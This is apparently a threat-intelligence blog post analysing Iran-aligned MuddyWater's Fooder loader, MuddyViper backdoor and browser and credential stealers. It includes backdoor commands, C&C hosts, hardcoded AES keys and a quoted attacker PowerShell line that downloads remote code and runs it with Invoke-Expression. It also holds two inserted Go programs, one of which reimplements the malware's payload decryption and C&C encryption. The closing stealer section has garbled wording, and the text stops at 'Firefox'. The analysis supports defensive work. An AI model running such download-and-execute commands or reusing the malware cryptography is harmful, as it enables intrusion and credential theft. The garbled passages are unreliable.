ESET researchers have identified new MuddyWater activity primarily targeting organizations in Israel, with one confirmed target in Egypt. MuddyWater, also known as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group known for its persistent targeting of government and critical infrastructure sectors, often leveraging custom malware and publicly available tools. In this campaign, the attackers deployed a set of previously undocumented custom tools with the objective of improving defense evasion and persistence. Among these tools is a custom loader, Fooder, designed to execute MuddyViper, a C/C++ backdoor. Several versions of Fooder masquerade as the classic Snake game, and the loader's internal logic includes a custom delay function inspired by the game's mechanics, combined with frequent Sleep API calls. These features are intended to delay execution and hinder automated analysis. MuddyViper enables the attackers to collect system information, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data. The campaign also leverages stealers (CE-Notes and LP-Notes) and reverse tunneling tools (go-socks5), long a favorite of MuddyWater operators.

Although this is our first public blogpost covering MuddyWater, ESET researchers have been tracking the group for several years and have documented its activities in several ESET APT Activity Reports. Unlike earlier MuddyWater campaigns, which were often noisy and easily detected, the one covered in this blogpost demonstrates a more focused, sophisticated, and refined approach.

Key points of this blogpost:

  • MuddyWater developers adopted CNG, the next-generation Windows cryptographic API, which is unique among Iran-aligned groups and rather atypical across the broader threat landscape.
  • The group also used more advanced techniques to deploy MuddyViper, a new backdoor, using a loader (Fooder) that reflectively loads it into memory and executes it.
  • We provide technical analyses of the tools used in this campaign, including MuddyViper, the Fooder loader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer, and go-socks5 reverse tunnels.
  • During this campaign, the operators deliberately avoided hands-on-keyboard interactive sessions, a historically noisy approach often characterized by mistyped commands.

MuddyWater group overview

MuddyWater is a cyberespionage group active since at least 2017, primarily targeting entities in the Middle East and North America. It is one of the most active Iran-aligned APT groups tracked by ESET researchers and has links to the Ministry of Intelligence and National Security of Iran.

The group was first introduced to the public as MuddyWater by Unit 42 in 2017, whose description of the group's activity is consistent with ESET's profiling: a focus on cyberespionage, the use of malicious documents as attachments designed to prompt users to enable macros and bypass security controls, and a primary targeting of entities located in the Middle East.

Notable past activities include Operation Quicksand (2020), a cyberespionage campaign targeting Israeli government entities and telecommunications organizations, which exemplifies the group's evolution from basic phishing tactics to more advanced, multistage operations; and a campaign targeting political groups and organizations in Türkiye, demonstrating the group's geopolitical focus, its ability to adapt social engineering tactics to local contexts, and its reliance on modular malware and flexible C&C infrastructure.

Besides being frequent, MuddyWater operations are often noisy. The group is known for its persistent targeting of government, military, telecommunications, and critical infrastructure sectors, often using custom malware and publicly available tools to gain access, maintain persistence, and exfiltrate sensitive data. In addition to targeting its archenemy, Israel, the group appears to target countries that maintain, or seek to strengthen, diplomatic ties with Iran.

ESET has documented several campaigns attributed to MuddyWater that highlight the group's evolving toolset and shifting operational focus. While the earlier operations relied on broad targeting and relatively unsophisticated techniques, more recent campaigns show signs of technical refinement and increased precision.

In March and April 2023, MuddyWater targeted an unidentified victim in Saudi Arabia by deploying a batch script that downloaded a PowerShell-based backdoor, which was used to download and execute arbitrary payloads and subsequently to remove the initial payload from disk.

The group carried out a campaign in January and February 2025 that was notable for its operational overlap with Lyceum (an OilRig subgroup), detailed later in this blogpost. This latest overlap suggests an evolution in MuddyWater's modus operandi.

The group's publicly documented custom tools include, for example, the Bugsleep, Blackout, Small Sieve, Mori, and POWERSTATS backdoors, as well as custom-compiled variants of open-source tools such as LaZagne or CrackMapExec. MuddyWater campaigns usually don't leverage or introduce new tools, malware, or techniques; instead, they are usually noteworthy because of their targeting.

While MuddyWater initially concentrated strictly on cyberespionage, its cooperation with Lyceum led to targeting of the manufacturing sector through spearphishing. The attack generated considerable noise and achieved little in terms of operational objectives.

The campaign outlined in this blogpost reveals what, for MuddyWater, seems to be an unprecedented advance in toolset and technical execution.

Victimology

As previously mentioned, during this campaign MuddyWater primarily targeted organizations in Israel, but also one in Egypt. Table 1 lists the victims by country and vertical. The campaign began on September 30th, 2024 and concluded on March 18th, 2025.

Table 1. Victims by country and vertical

Country   Vertical
Egypt     Technology
Israel    Engineering #1
          Engineering #2
          Engineering #3
          Local Government #1
          Local Government #2
          Manufacturing
          Technology
          Transportation
          Utilities
          University #1
          University #2
          University #3
          Unidentified #1
          Unidentified #2
          Unidentified #3
          Unidentified #4
          Unidentified #5

One interesting thing to note about the victim in the utilities vertical is that it was also compromised by Lyceum on February 11th, 2025.

Overlap and cooperation with Lyceum

In early 2025, ESET Research identified an operational overlap between MuddyWater and Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group, also known as HEXANE or Storm-0133. OilRig has been active since at least 2014 and is generally believed to be based in Iran. Tools that we attribute to Lyceum include DanBot, Shark, Milan, Marlin, Solar, Mango, OilForceGTX, and a variety of downloaders that leverage legitimate cloud services for C&C communication. We have previously observed Lyceum targeting several Israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector.

During the campaign covered here, MuddyWater carried out a joint sub-campaign with OilRig in January and February 2025. MuddyWater initiated access through a spearphishing email containing a link to an installer for the Syncro remote monitoring and management (RMM) software. Following the initial compromise, the attackers installed an additional RMM tool, PDQ, and deployed a custom Mimikatz loader disguised as certificate files with .txt extensions. Based on the observed activity, the harvested credentials were most likely used by Lyceum to gain access to, and assume control of operations within, the targeted manufacturing-sector organization in Israel.

This cooperation suggests that MuddyWater may be acting as an initial access broker for other Iran-aligned groups.

Attribution

The victimology, TTPs, and tooling observed in this campaign align with what we have previously attributed to MuddyWater, including the code overlaps between the newly documented tools and known MuddyWater malware described below. The assessment is also based on the initial access method and the subsequent delivery of malicious tools, usually via spearphishing emails that contain links to download RMM software.

TTPs

MuddyWater operators continue to rely on predictable, script-based backdoors written in PowerShell and Go. Their targeting remains focused on the telecommunications, governmental, and oil and energy sectors.

Initial access is usually achieved through spearphishing emails, often containing PDF attachments that link to installers for RMM software hosted on free file-sharing platforms such as OneHub, Egnyte, or Mega. These links lead to the download of RMM tools including Atera, Level, PDQ, and SimpleHelp.

Among the tools deployed by MuddyWater operators is also the VAX-One backdoor, named after the legitimate software that it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.

The group's continued reliance on this familiar playbook makes its activity relatively easy to detect and block.

Instruments overlap

Additionally, we identified code overlaps between several of the newly documented tools and those we previously attributed to MuddyWater:

  • LP-Notes, a new credential stealer, has the same design as CE-Notes, a browser-data stealer that we previously associated with MuddyWater. During this campaign, we also observed a Mimikatz loader that shares the same design and obfuscation methods as CE-Notes.
  • We observed several new variants of MuddyWater's customized go-socks5 reverse tunnels, which the group used throughout 2024 and 2025.
  • In two instances, we observed the customized go-socks5 reverse tunnels embedded in a new MuddyWater loader, internally named Fooder. In a dozen other cases, this loader was used to load MuddyWater's new backdoor, MuddyViper.
  • Interestingly, MuddyViper and the CE-Notes/LP-Notes/Mimikatz loader variants use the CNG API for data encryption and decryption. To the best of our knowledge, this is unique among Iran-aligned groups. Another trait these tools share is that they attempt to steal user credentials by displaying a fake Windows Security dialog.

Toolset

In this blogpost, we document previously unknown custom tools used by MuddyWater:

  • Fooder loader – a newly identified loader that loads the MuddyViper backdoor into memory and executes it. Note that several versions of Fooder masquerade as the classic Snake game, hence the designation MuddyViper. Another notable characteristic of Fooder is its frequent use of a custom delay function that implements the core logic of the Snake game, combined with Sleep API calls. These features are intended to delay execution in an attempt to hide malicious behavior from automated analysis systems.
  • MuddyViper backdoor – a previously undocumented C/C++ backdoor that allows attackers to collect system information, download and upload files, execute files and shell commands, and steal Windows credentials and browser data.

The rest of the toolset documented in this blogpost includes:

  • CE-Notes, a browser-data stealer,
  • LP-Notes, a credential stealer,
  • Blub, a browser-data stealer, and
  • several go-socks5 reverse tunnels.

Fooder loader

Fooder is a 64-bit C/C++ loader designed to decrypt and then reflectively load the embedded payload (as illustrated in Figure 1), with MuddyViper being the most frequently observed payload.

Figure 1. Relationships between Fooder and its launcher and payload

Fooder seems to be the internal name of this tool, based on its PDB paths:

  • C:\Users\win\Desktop\Fooder\Debug\Launcher.pdb
  • C:\Users\pc\Desktop\main\My_Project\Fooder\x64\Debug\Launcher.pdb

Although we have captured only one sample of it, we believe that Fooder is executed by a simple launcher application written in C. It has no string obfuscation, logs verbosely to the console, and has its PDB path left intact:

C:\Users\pc\source\repos\ConsoleApplication7\x64\Release\ConsoleApplication7.pdb

We have observed one instance (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) of the component launching Fooder. Deployed under the name %USERPROFILE%\Downloads\OsUpdater.exe, the launcher expects a process ID as a command line argument. Once executed, it duplicates the token of the specified process via the DuplicateTokenEx API and then uses CreateProcessAsUserA to execute Fooder with that token, so that Fooder runs in the security context of the chosen process rather than that of the launcher.

Once executed, Fooder decrypts the embedded payload in the following steps:

  • The command line argument (6) is added to each byte of a hardcoded key, which produces the AES decryption key shared across all samples: 6969697820511281801712341067111416133321394945138510872296106446.
  • A hardcoded value (5) is subtracted from each byte of the hardcoded payload.
  • Finally, the payload is decrypted using the WinCrypt API and the AES key.

Fooder then loads the decrypted payload directly into memory using reflective loading techniques, allowing it to execute without going through the standard Windows loader or writing the payload to disk.

Launched this way, Fooder has been used to deliver not only MuddyViper but also HackBrowserData, an open-source tool capable of decrypting and exporting sensitive browser information such as credentials and cookies. Fooder also facilitates the deployment of go-socks5 variants, Go-compiled binaries that function as reverse tunnels, enabling attackers to bypass firewalls and Network Address Translation (NAT) mechanisms. Notably, the MuddyWater group has previously used go-socks5 independently of Fooder, indicating a continued reliance on this tool for stealthy network communication and data exfiltration.

Note that several versions of Fooder masquerade as the Snake game (see the strings and mutexes highlighted in Figure 2), which inspired the name of its most frequently embedded payload, MuddyViper.

Figure 2. Multiple Fooder instances masquerade as the Snake game

Another notable characteristic of Fooder is its frequent use of a custom delay function (which implements the core logic of the Snake game, where the player maneuvers the head of a growing line, usually themed as a snake, to avoid obstacles and collect items) and of Sleep API calls. The delay in execution is achieved by mimicking the game's loop-based timing: as in the Snake game, where each move is controlled by a loop that waits for a short interval before updating the game, the loop introduces execution delays that slow down the malware's behavior, helping it to evade tools that monitor for rapid malicious activity. Figure 3 highlights the delays and the Snake game welcome banner presented to the user at runtime.

Figure 3. Various calls to delay execution are dispersed throughout Fooder's code

Fooder doesn't have any built-in persistence capability. However, when Fooder's final payload is the MuddyViper backdoor, the backdoor can set up persistence for the loader via a scheduled task or the Startup folder.

MuddyViper backdoor

MuddyViper, a previously undocumented backdoor written in C and C++, gives the attackers covert access to and control over compromised systems. We have observed MuddyViper only in memory, loaded by Fooder, which may be the reason there is no obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extremely verbose and frequent status messages to its C&C server throughout its execution, such as the following:

  • [+] Persist: -------------------- Hello,I'm Live --------------------
  • [+] Persist: -------------------- Hello,First Time --------------------
  • [-] Persist: failed Create task !!!!

The backdoor also carries a lengthy list of 150+ process names, together with details about the respective products, so that it can send detailed reports about the security tools detected in the compromised environment, even though the details could easily have been added on the server side:

  • [>] Process: aciseagent.exe ~~> (Cisco Umbrella Roaming Security) --> (Security DNS) found!
  • [>] Process: acnamagent.exe ~~> (Absolute Persistence) --> (Asset Management) found!
  • [>] Process: acnamlogonagent.exe ~~> (Absolute Persistence) --> (Asset Management) found!

This behavior results in substantial network traffic.

MuddyViper has two methods of establishing persistence:

  • A scheduled task named ManageOnDriveUpdater, which launches MuddyViper from its installation path on each system start (set by command ID 806 in Table 2).
  • An entry in the Windows Startup folder, which is the persistence that the uninstall command (ID 900 in Table 2) clears.

MuddyViper supports 20 backdoor commands – see Table 2 for details of all of them – notably including the ability to open and operate reverse shells; download, upload, and execute files; report the running security tools; steal user credentials and data from a variety of browsers; set up its own persistence; and uninstall itself.

Table 2. MuddyViper backdoor commands (the command ID is the HTTP status code returned by the C&C server)

ID 200
  Arguments: N/A
  Action: N/A
  Response: 0, via the GET /adad or GET /aq36 request, to obtain a backdoor command.

ID 207
  Arguments: N/A
  Action: Decrypts the embedded HackBrowserData tool and reflectively loads it in a new thread. This open-source tool can steal credentials, history, and other information from web browsers. MuddyViper then compresses the collected data (into a file named CacheDump.zip) and uploads it to the C&C server.
  Response: Collected browser data, via the GET /mq65 request. In case of an error, a custom status message is sent instead.

ID 300, 301, 302
  Arguments: <command_line> (300); N/A (301, 302)
  Action: Launches a reverse shell using the provided command line (300), C:\windows\system32\cmd.exe (301), or C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe (302). Then, in a loop, uploads the process output to the C&C server and interprets the server response (see command IDs 350-352) until interrupted.
  Response: Process output, via the GET /oi32 request. In case of an error, a custom status message is sent instead.

ID 350
  Arguments: N/A
  Action: Must follow command IDs 300-302. Sleeps for the configured amount of time – for the reverse shell loop, the default is one second.

ID 351
  Arguments: Sleep time (in milliseconds)
  Action: Must follow command IDs 300-302. Configures the sleep time for the reverse shell loop – the default is one second.

ID 352
  Arguments: Input for the reverse shell
  Action: Must follow command IDs 300-302. Passes the provided argument to the running reverse shell.

ID 360
  Arguments: N/A
  Action: Not implemented; likely related to the reverse shell API.
  Response: A custom error message: [-] Agent doesn't have an active pipe

ID 400
  Arguments: Flag
  Action: Must follow command ID 401. Confirms that the C&C server has successfully received a part of the exfiltrated local file. Optionally adjusts the sleep before the next upload specified in command ID 401 to 10 seconds.
  Response: None, unless this command is issued outside of a pending file upload, in which case a custom error message is sent: [-] Agent doesn't have an DOWNLOAD file

ID 401
  Arguments: Sleep time (in milliseconds), filename
  Action: Initiates an upload of the specified local file to the C&C server in chunks, with the specified sleep time between chunks.
  Response: Contents of the specified file, via a series of GET /dadw requests.

ID 500
  Arguments: Data chunk
  Action: Must follow command ID 501. Writes the received data chunk into the previously created and opened local file.
  Response: A custom error message, if the operation fails.

ID 501
  Arguments: Sleep time (in milliseconds), filename
  Action: Downloads a file from the C&C server in chunks into a local file with the specified name. The specified sleep time is used as a delay after downloading each chunk. Deletes the file if the connection can't be established after six consecutive attempts.
  Response: A series of GET /dadwqa requests, to request the file contents.

ID 700
  Arguments: Sleep time (in milliseconds)
  Action: Configures the sleep time between connection attempts to the specified value (default is 60 seconds).
  Response: N/A

ID 800
  Arguments: N/A
  Action: Enumerates running processes, looking for selected security tools from an extensive hardcoded list.
  Response: For each detected process, a report populated from that hardcoded table: [>] Process: <process_name> ~~> (<product_name>) --> (<category>) found!

ID 805
  Arguments: Timeout (in milliseconds)
  Action: Displays a fake Windows Security dialog (see Figure 4), prompting the user to fill in credentials, which are then exfiltrated to the C&C server. Uses the provided argument as a timeout for the dialog.
  Response: Collected credentials, via the GET /rq13 request: [+] creds ~~> Username:<username> ~~> Password:<password>. If not successful, a custom error message is sent instead.

ID 806
  Arguments: N/A
  Action: Sets up persistence via a scheduled task named ManageOnDriveUpdater. The backdoor copies itself to its installation path, unless it's already running from there.
  Response: A custom status message, depending on the result of the operation.

ID 900
  Arguments: N/A
  Action: Uninstalls itself. First clears the persistence set via the Windows Startup folder and then deletes itself. Note that this action won't clear the scheduled-task persistence that can be set by command ID 806.
  Response: A custom status message, depending on the result of the operation.

ID 905
  Arguments: N/A
  Action: Terminates the current backdoor process.
  Response: N/A

ID 906
  Arguments: N/A
  Action: Relaunches itself (via the CreateProcessW API) and terminates the current process.
  Response: A custom status message, depending on the result of the operation.

Other
  Arguments: N/A
  Action: N/A
  Response: [-] Agent statusCode I don't have it

One of the commands listed in Table 2, with ID 805, displays a fake Windows Security dialog in an attempt to entice the victim into filling in their Windows credentials, as seen in Figure 4. A similar technique is used by MuddyWater's LP-Notes stealer (see LP-Notes credential stealer).

Figure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)

Another command, with ID 900, aims to remove MuddyViper from the compromised machine and clear its persistence; however, the command doesn't remove all traces of the backdoor. It clears only the Startup folder entry, so a ManageOnDriveUpdater scheduled task created via command ID 806 survives the uninstall and is worth checking for during incident response.

Community protocol

To communicate with its C&C server, MuddyViper uses HTTP GET requests (via the WinHTTP API) over port 443, with the WINHTTP_FLAG_SECURE flag set so that the connection uses SSL/TLS. Two C&C servers have been observed: processplanet[.]org and 35.175.224[.]64.

Both directions of communication AES-CBC encrypt the data, using the CNG API with the key (shared across samples) 0608101047106453101617106423101013101012101083109710108585106969 and an all-zero IV.

In the backdoor → server direction of the communication:

  • Each endpoint URI supported by the C&C server is used by the backdoor for a specific type of request, such as requesting a command, uploading a file, or sending a custom status message.
  • Additional data for the C&C server is included in the HTTP request body, which is unconventional for HTTP GET requests.
  • The User-Agent string is A WinHTTP Example Program/1.0, a remnant of the example code for the WinHttpOpen API.
  • The connect, send, receive, and response timeouts are set to 30 seconds.
  • The default sleep time between consecutive connection attempts is 60 seconds. This value can be configured by command ID 700.
  • Upon failure, connection attempts are retried up to 10 times.
  • Prior to encryption, the data is always formatted as <computer_name>/<username>*<data>.
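
The traits above (a GET request that carries a body, the WinHttpOpen sample User-Agent, the fixed set of endpoint paths, and the 60-second default poll interval) translate directly into detection logic. The Go program below is an added example written for this page, not ESET's or the malware's code: it scores constructed proxy log lines against those traits and flags hosts that are polled at a regular cadence of about a minute. The pipe-separated log format, the timestamps, the 5-second tolerance and the benign host are assumptions made for the example; processplanet.org is one of the two C&C servers named above.

```go
package main

import (
	"fmt"
	"sort"
	"strconv"
	"strings"
	"time"
)

// ProxyEntry is one outbound request as a TLS-inspecting proxy might record it.
type ProxyEntry struct {
	Time    time.Time
	Method  string
	Host    string
	Path    string
	BodyLen int
	UA      string
}

const winhttpSampleUA = "A WinHTTP Example Program/1.0" // remnant of the WinHttpOpen sample code
var muddyViperPaths = map[string]bool{"/adad": true, "/aq36": true, "/mq65": true,
	"/oi32": true, "/rq13": true, "/dadw": true, "/dadwqa": true}

// ParseLine reads the constructed "RFC3339|METHOD|host|path|bodylen|user-agent" format.
func ParseLine(line string) (ProxyEntry, error) {
	f := strings.Split(line, "|")
	if len(f) != 6 {
		return ProxyEntry{}, fmt.Errorf("want 6 fields, got %d: %q", len(f), line)
	}
	ts, terr := time.Parse(time.RFC3339, f[0])
	n, nerr := strconv.Atoi(f[4])
	if terr != nil || nerr != nil {
		return ProxyEntry{}, fmt.Errorf("bad timestamp or body length in %q", line)
	}
	return ProxyEntry{Time: ts, Method: f[1], Host: f[2], Path: f[3], BodyLen: n, UA: f[5]}, nil
}

// ScoreEntry lists the MuddyViper protocol traits a single request exhibits.
func ScoreEntry(e ProxyEntry) []string {
	var hits []string
	if e.UA == winhttpSampleUA {
		hits = append(hits, "WinHttpOpen sample User-Agent")
	}
	if e.Method == "GET" && e.BodyLen > 0 {
		hits = append(hits, "GET request carrying a body")
	}
	if muddyViperPaths[e.Path] {
		hits = append(hits, "known C&C endpoint "+e.Path)
	}
	return hits
}

// RegularBeacons returns hosts contacted at least three times whose median gap between
// requests lies within tolerance of expected (MuddyViper's default poll is 60 s).
func RegularBeacons(entries []ProxyEntry, expected, tolerance time.Duration) []string {
	byHost := map[string][]time.Time{}
	for _, e := range entries {
		byHost[e.Host] = append(byHost[e.Host], e.Time)
	}
	var out []string
	for host, ts := range byHost {
		if len(ts) < 3 {
			continue
		}
		sort.Slice(ts, func(i, j int) bool { return ts[i].Before(ts[j]) })
		gaps := make([]time.Duration, 0, len(ts)-1)
		for i := 1; i < len(ts); i++ {
			gaps = append(gaps, ts[i].Sub(ts[i-1]))
		}
		sort.Slice(gaps, func(i, j int) bool { return gaps[i] < gaps[j] })
		if d := gaps[len(gaps)/2] - expected; d >= -tolerance && d <= tolerance {
			out = append(out, host)
		}
	}
	sort.Strings(out)
	return out
}

// SampleLog is constructed: four C&C polls about a minute apart (one jittered) beside ordinary browsing.
var SampleLog = []string{
	"2025-01-15T10:00:00Z|GET|processplanet.org|/adad|24|" + winhttpSampleUA,
	"2025-01-15T10:01:00Z|GET|processplanet.org|/adad|24|" + winhttpSampleUA,
	"2025-01-15T10:02:03Z|GET|processplanet.org|/adad|24|" + winhttpSampleUA,
	"2025-01-15T10:03:03Z|GET|processplanet.org|/oi32|512|" + winhttpSampleUA,
	"2025-01-15T10:00:10Z|GET|example.org|/index.html|0|Mozilla/5.0",
	"2025-01-15T10:00:11Z|GET|example.org|/style.css|0|Mozilla/5.0",
	"2025-01-15T10:04:40Z|GET|example.org|/app.js|0|Mozilla/5.0",
}

func main() {
	var entries []ProxyEntry
	for _, l := range SampleLog {
		e, err := ParseLine(l)
		if err != nil {
			panic(err)
		}
		entries = append(entries, e)
		fmt.Printf("%s %s: %v\n", e.Host, e.Path, ScoreEntry(e))
	}
	fmt.Println("hosts polled at ~60 s intervals:", RegularBeacons(entries, 60*time.Second, 5*time.Second))
}
```

The per-request traits are the high-confidence signal: a GET with a body from that User-Agent is worth an alert on its own, while the cadence check is a weaker indicator to be combined with the others, because command ID 700 lets the operator change the interval at will.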

In the server → backdoor direction of the communication:

  • The HTTP status code determines the backdoor command ID (see Table 2).
  • The backdoor command arguments are included in the HTTP response body.
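
The Go program below is an added example, not code from the original post or from the malware, that reproduces two procedures described on this page: the Fooder payload decryption steps (key text = stored key bytes plus the command-line argument; ciphertext = stored payload bytes minus 5; then AES decryption) and the MuddyViper message framing (AES-CBC under the shared C&C key, plaintext formatted as <computer_name>/<username>*<data>). It assumes that the two 64-character key strings quoted above are hex encodings of 32-byte AES-256 keys, that Fooder's WinCrypt call uses CBC mode with a zero IV like the network protocol, and that padding is PKCS#7; none of that is stated on the page. The sample payload and beacon are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Key strings quoted in the analysis. Both are 64 characters; this example assumes
// each is the hex encoding of a 32-byte AES-256 key and models "IV 0" as 16 zero bytes.
const (
	FooderSharedKey = "6969697820511281801712341067111416133321394945138510872296106446"
	MuddyViperC2Key = "0608101047106453101617106423101013101012101083109710108585106969"
)

func newAES(hexKey string) (cipher.Block, error) {
	key, err := hex.DecodeString(hexKey)
	if err != nil {
		return nil, err
	}
	return aes.NewCipher(key)
}

// CBCEncrypt is AES-CBC with a zero IV and PKCS#7 padding (the CNG default).
func CBCEncrypt(hexKey string, pt []byte) ([]byte, error) {
	blk, err := newAES(hexKey)
	if err != nil {
		return nil, err
	}
	p := aes.BlockSize - len(pt)%aes.BlockSize
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(p)}, p)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(blk, make([]byte, aes.BlockSize)).CryptBlocks(ct, padded)
	return ct, nil
}

// CBCDecrypt rejects unaligned input and bad padding rather than returning garbage.
func CBCDecrypt(hexKey string, ct []byte) ([]byte, error) {
	blk, err := newAES(hexKey)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext not block aligned")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(blk, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	p := int(pt[len(pt)-1])
	if p == 0 || p > aes.BlockSize || !bytes.Equal(pt[len(pt)-p:], bytes.Repeat([]byte{byte(p)}, p)) {
		return nil, errors.New("bad PKCS#7 padding")
	}
	return pt[:len(pt)-p], nil
}

// ShiftBytes adds delta to every byte, wrapping at 256 like unsigned C arithmetic.
func ShiftBytes(in []byte, delta int) []byte {
	out := make([]byte, len(in))
	for i, b := range in {
		out[i] = byte(int(b) + delta)
	}
	return out
}

// DecryptFooderPayload reproduces the loader's three steps: stored key + argument gives
// the key text, stored payload - 5 gives the ciphertext, and AES-CBC (assumed) decrypts it.
func DecryptFooderPayload(storedKey []byte, arg int, storedPayload []byte) ([]byte, error) {
	return CBCDecrypt(string(ShiftBytes(storedKey, arg)), ShiftBytes(storedPayload, -5))
}

// FormatBeacon builds the plaintext MuddyViper encrypts before every request.
func FormatBeacon(computer, user, data string) string {
	return computer + "/" + user + "*" + data
}

// ParseBeacon inverts FormatBeacon; data may contain '/' or '*', so only the first of each counts.
func ParseBeacon(s string) (computer, user, data string, err error) {
	i, j := strings.Index(s, "/"), strings.Index(s, "*")
	if i < 0 || j < i {
		return "", "", "", fmt.Errorf("not a <computer>/<user>*<data> message: %q", s)
	}
	return s[:i], s[i+1 : j], s[j+1:], nil
}

func main() {
	// Constructed beacon, modelled on the status messages quoted above.
	body, err := CBCEncrypt(MuddyViperC2Key, []byte(FormatBeacon("DESKTOP-01", "alice", "[+] Persist: Hello,First Time")))
	if err != nil {
		panic(err)
	}
	plain, _ := CBCDecrypt(MuddyViperC2Key, body)
	c, u, d, _ := ParseBeacon(string(plain))
	fmt.Printf("%d-byte request body -> computer=%s user=%s data=%q\n", len(body), c, u, d)
}
```

Against a real sample, the stored key and payload would be carved from the loader's data section and the argument taken from the launcher's command line; a wrong argument yields non-hex key text or a padding error rather than garbage, which is a quick way to confirm or refute the assumed key handling. Decrypting a captured request body with CBCDecrypt and splitting it with ParseBeacon recovers the host and user names that every MuddyViper message carries.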

CE-Notes browser-data stealer

CE-Notes is a browser-data stealer that we named after the filename – ce-notes.txt – that it uses to stage stolen data on disk. We discovered CE-Notes in 2024 when we observed MuddyWater deploying EXE and DLL versions of it on the system of an organization in Israel.

CE-Notes was downloaded with the following PowerShell command:

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression

Both versions of the browser-data stealer attempt to steal and decrypt the app-bound encryption key stored in the Local State file (%LOCALAPPDATA%\Google\Chrome\User Data\Local State) of Chromium browsers (Chrome, Brave, and Edge). App-bound encryption was introduced in Chrome version 127, allowing Chrome to encrypt data tied to the application's identity, so that the user's DPAPI key alone is no longer sufficient to decrypt it. Cybercriminals and APT groups have caught on and are actively trying to work around app-bound encryption to steal session cookies and other browser secrets. CE-Notes is very similar to ChromElevator on GitHub.

The collected data is AES-CBC encrypted using the CNG API with the key 9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F and the IV 4103A09887B82FFD56A93BB431805224.

Then the encrypted data is stored on disk in C:\Users\Public\Downloads\ce-notes.txt for later retrieval (probably via an RMM tool, since neither the EXE nor the DLL version has any means of exfiltrating the file). The main difference between the EXE and the DLL is the virtual machine evasion functionality added to the DLL.

We observed the CE-Notes browser-data stealer in the following locations:

  • C:\system2.dll
  • C:\Users\Public\Downloads\system2.dll
  • C:\Intel\system.dll
  • C:\20240926_165509.exe

LP-Notes credential stealer

LP-Notes is a C/C++ Windows credential stealer with the same design as the CE-Notes browser-data stealer. Following the same naming convention as for CE-Notes, we named the stealer LP-Notes after the local file it uses to stage stolen credentials before exfiltration: C:\Users\Public\Downloads\lp-notes.txt (vs. C:\Users\Public\Downloads\ce-notes.txt). The sole purpose of LP-Notes is to entice victims into submitting their credentials by displaying a fake Windows Security dialog, prompting them to enter their Windows username and password. We have observed an instance of LP-Notes being downloaded and executed by PowerShell with a command line very similar to that shown in the CE-Notes section.

Initialization

On execution, LP-Notes starts by looking for a process named taskhostw.exe (Host Process for Windows Tasks) and then impersonating the security context of that process (via the ImpersonateLoggedOnUser API); only then does LP-Notes activate its malicious payload.

LP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption. Figure 5 shows the function that decrypts strings of lengths ranging from 15 to 19 characters; the decryption key is always the same – a set of predefined constants that are added to or subtracted from each byte of the string. Interestingly, CE-Notes uses the same decryption routine, except with a different decryption key, as shown in Figure 6.

Figure 5. LP-Notes string decryption routine
Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes

LP-Notes uses string stacking for strings shorter than 15 or longer than 19 characters, including the decryption key, IV, and import names. Finally, to obscure its use of Windows API functions and to make static analysis harder, LP-Notes dynamically resolves the API functions during the C runtime startup, before the execution of the WinMain function (the standard entry point for a graphical Windows-based application per Microsoft), thus hiding direct references to the API functions from the pseudocode view (see Figure 7).

Figure 7. LP-Notes WinMain function with obfuscated import names (left) vs. deobfuscated view (right)

Capabilities

In an infinite loop, LP-Notes displays a fake Windows Security dialog prompting the victim to enter their Windows username and password, as shown in Figure 8 (via the CredUIPromptForWindowsCredentialsW API). Note that although similar, this is not the same as the fake credential prompt used by MuddyViper (see Figure 4). It immediately verifies the validity of any submitted credentials by attempting to log on as that user (via the CredUnPackAuthenticationBufferW and LogonUserW APIs).

Figure 8. A fake Windows Security dialog displayed by LP-Notes

If the logon succeeds, the harvested credentials are AES-CBC encrypted using the CNG API with the key ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the IV 91A4E6F6D51DAEE773A8F00279792578.

Similar to CE-Notes, LP-Notes then stores the encrypted credentials in a local file – in this case C:\Users\Public\Downloads\lp-notes.txt. As neither of these components has the capability to exfiltrate data, another component presumably handles this (either an RMM tool or MuddyViper).

Blub browser-data stealer

Blub is a C/C++ browser-data stealer incorporating a statically linked SQLite library. The identify is derived from its filename, Blub.exe. We noticed the PDB path C:Usersjojosourcereposstealerx64Releasestealer.pdb. It steals person login information from Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera net browsers.

Chromium-based browsers

For Chrome, Blub first terminates chrome.exe (if running) and then parses and decrypts the encryption key from C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Local State. This key is used to encrypt sensitive data stored by Chrome, such as passwords or cookies, and it is protected by the Data Protection API (DPAPI) so that it can only be decrypted on the system where it was originally encrypted. Blub decrypts this key via the CryptUnprotectData API, and then uses it to decrypt user credentials obtained from all existing Chrome user profiles on the compromised computer. The credentials, stored in C:\Users\<username>\AppData\Local\Google\Chrome\User Data\<profile_name>\Login Data, are obtained via the following SQL query:

SELECT origin_url, username_value, password_value FROM logins

A similar series of steps is used to obtain and decrypt user credentials from Microsoft Edge and Opera user profiles, using the key obtained from C:\Users\<username>\AppData\Local\Microsoft\Edge\User Data\Local State and C:\Users\<username>\AppData\Roaming\Opera Software\Opera Stable\Local State, respectively.

Firefox

